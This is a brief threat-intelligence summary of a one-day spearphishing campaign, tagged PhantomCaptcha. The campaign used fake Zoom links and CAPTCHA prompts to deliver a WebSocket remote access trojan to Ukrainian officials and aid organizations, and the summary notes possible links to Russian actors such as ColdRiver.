A one-day spearphishing campaign targeting Ukrainian officials and humanitarian organizations used fake CAPTCHA prompts to deliver a WebSocket Remote Access Trojan. The attack involved social engineering, fake communications, and malware that exfiltrated sensitive system data, with links to possible Russian threat actor infrastructure. #PhantomCaptcha #ClickFix #ColdRiver
Keypoints
- The campaign targeted Ukrainian government and aid organizations, including the Red Cross and UNICEF.
- The attackers used fake Zoom links and CAPTCHA prompts to trick victims into executing malicious PowerShell commands.
- The malware collected system information and established remote control through a WebSocket RAT.
- The campaign was transient, but linked to subsequent activity involving Android spyware and cloud storage tools.
- Detected infrastructure and malware suggest connections to Russian threat groups such as ColdRiver.